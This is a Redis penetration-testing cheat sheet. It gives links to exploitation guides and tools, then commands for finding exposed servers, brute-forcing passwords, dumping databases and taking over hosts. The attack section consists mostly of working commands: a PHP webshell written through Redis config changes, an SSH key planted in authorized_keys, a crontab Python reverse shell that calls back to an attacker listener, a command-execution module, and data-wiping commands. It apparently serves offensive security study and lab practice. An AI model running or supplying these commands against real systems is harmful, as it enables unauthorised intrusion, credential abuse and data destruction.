Resources
- Core Concepts
- By geeksforgeeks : https://www.geeksforgeeks.org/system-design/introduction-to-redis-server/
- By hostman : https://hostman.com/tutorials/redis-getting-started-and-basic-commands/
- By dragonflydb : https://www.dragonflydb.io/guides/redis-best-practices
- By severalnines : https://severalnines.com/blog/redis-how-installation-setup-and-configuration/
- By digitalocean : https://www.digitalocean.com/community/tutorials/how-to-install-and-secure-redis-on-ubuntu-18-04
- Exploitation :
- By verylazytech : https://medium.verylazytech.com/hands-on-guide-to-exploiting-redis-mongodb-and-misconfigured-databases-master-real-world-attacks-c990a0cfdbd6
- By pentester academy : https://blog.pentesteracademy.com/redis-arbitrary-file-upload-7c3fce56d04f
- CVE-2022-24834 : https://ethicalhacking.uk/redis-exploit-a-technical-deep-dive-into-cve-2022-24834/#gsc.tab=0
- By Victor : https://medium.com/@Victor.Z.Zhu/redis-unauthorized-access-vulnerability-simulation-victor-zhu-ac7a71b2e419
- By reverse-tcp : https://web.archive.org/web/20191201022931/http://reverse-tcp.xyz/pentest/database/2017/02/09/Redis-Hacking-Tips.html
- By zeronights : https://web.archive.org/web/20240327213708/https://2018.zeronights.ru/wp-content/uploads/materials/15-redis-post-exploitation.pdf
- CVE-2025-49844 (redishell): https://www.wiz.io/blog/wiz-research-redis-rce-cve-2025-49844 | https://www.sysdig.com/blog/cve-2025-49844-redishell | https://redrays.io/blog/poc-for-cve-2025-49844-cve-2025-46817-and-cve-2025-46818-critical-lua-engine-vulnerabilities/ | https://www.offsec.com/blog/recent-vulnerabilities-in-redis-servers-lua-scripting-engine/
- Examples :
- Machines :
Cheat sheet
- By secyber : https://secybr.com/posts/redis-pentesting-best-practices/
- By kh4sh3i : https://github.com/kh4sh3i/Redis-Pentesting
- By routezero : https://routezero.security/2025/05/01/redis-cheat-sheet-for-penetration-testers/
- By d4rkc0de : https://publish.obsidian.md/d4rkc0de/oscp-tips/004-port-server-pentest/server-redis-port-6379
- By snovvcra : https://ppn.snovvcra.sh/pentest/infrastructure/dbms/redis
- Redis commands : https://gist.github.com/LeCoupa/1596b8f359ad8812c7271b5322c30946
Commands
- Core
- Data Types
- String
SET name "educative" get name - List
LPUSH mylist x LPUSH mylist y RPUSH mylist z LRANGE mylist 0 -1 - Sets
SADD myset "a" "b" "c" "a" SMEMBERS myset - Hash ( They are used to represent objects, but can store many elements and are useful for other tasks as well.)
HMSET user:1000 username antirez password P1pp0 age 34 HGETALL user:1000 HSET user:1000 password 12345 HGETALL user:1000In fact, a hash can store up to (2^32)-1 field-value pairs, which equates to more that 4 billion.
- String
- Data Types
- Recon
- Enum
# Shodan port:6379 product:Redis # Censys services.service_name: REDIS # nmap nmap -p 6379,27017 --open -Pn 10.0.0.0/8 nmap --script redis-info -sV -p 6379 192.168.99.21 # Banner graping nc -vn 192.168.99.21 6379 # MSF msf > use auxiliary/scanner/redis/redis_server - Brute force
nmap --script redis-brute -p 6379 192.168.99.21 msf > use auxiliary/scanner/redis/redis_login hydra -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt 192.168.99.21 redis # Faster
- Enum
- Exploit
- Connect
redis-cli -h 10.129.134.253 # NO AUTH Test with redis-cli -h 10.129.134.253 -p 6379 redis-cli -h 192.168.99.21 -a redis12345 # With password
- Connect
- Post Exploitation
- Redis commands
INFO # Server info PING # I'm ok ! AUTH default redis12345 # Good username & Password CLIENT LIST # Connected clients CONFIG GET * # Get configs INFO Keyspace # How many database SELECT 0 # Select database number (From INFO keyspace) KEYS * # Dump keys flushall # Flush any database - Database Dump
npm install redis-dump -g redis-dump -h 192.168.99.22 -a pass123 -f 'mydb:*' > mydb.dump.txt - Shell
- Webshell
# You must know the physical path of the Web site config set dir /var/www/html/ # Write permission config set dbfilename redis.php set test "<?php system($_GET['cmd']); ?>" save Then curl http://192.168.99.21/redis.php?cmd=ifconfig --output - # Tips & Tricks # Finding the web dir /var/www/html /home/redis/.ssh /var/lib/redis/.ssh /var/spool/cron/crontabs /var/spool/cron $ for dname in 'cat dirs.txt'; do redis-cli -h 192.168.99.21 config set dir $dname - SSH
ssh-keygen -t rsa (echo -e "\n\n"; cat ./id_rsa; echo -e "\n\n") > foo.txt cat foo.txt | redis-cli -h 192.168.99.21 -a redis12345 -x set crackit redis-cli -h 192.168.99.21 -a redis12345 192.168.99.21:6379> config set dir home/app/.ssh # From the Config 192.168.99.21:6379> config set dbfilename "authorized_keys" 192.168.99.21:6379> save chmod 600 id_rsa ssh -i id_rsa app@192.168.99.21 - Crontabs (Root needed to run the server)
echo -e "\n\n\n*/1 * * * * /usr/bin/python3 -c 'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.99.22\",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(\"/bin/bash\")'\n\n\n" | redis-cli -h 192.168.99.21 -a redis12345 -x set crackme redis-cli -h 192.168.99.21 -a redis12345 config set dir /var/spool/cron/crontabs redis-cli -h 192.168.99.21 -a redis12345 config set dbfilename root redis-cli -h 192.168.99.21 -a redis12345 save rlwrap nc -nlvp 8888 - Load Redis Module
https://github.com/n0b0dyCN/RedisModules-ExecuteCommand 127.0.0.1:6379> system.exec "id" "uid=0(root) gid=0(root) groups=0(root)\n" 127.0.0.1:6379> system.exec "whoami" "root\n" 127.0.0.1:6379> system.rev 127.0.0.1 9999 Unload the module whenever you want: MODULE UNLOAD mymodule
- Webshell
- Redis commands
Tools
- Redis-server-expoit : https://github.com/iw00tr00t/Redis-Server-Exploit/tree/master
- redis-dump : https://www.npmjs.com/package/redis-dump
- RedisModules-ExecuteCommand : https://github.com/n0b0dyCN/RedisModules-ExecuteCommand
- goherus : https://github.com/tarunkant/Gopherus
- Rouge_Server : https://github.com/n0b0dyCN/redis-rogue-server
- redis : https://github.com/antirez/redis
Machiens
Notes
Service Down Try : rm -f /var/lib/redis/dump.rdb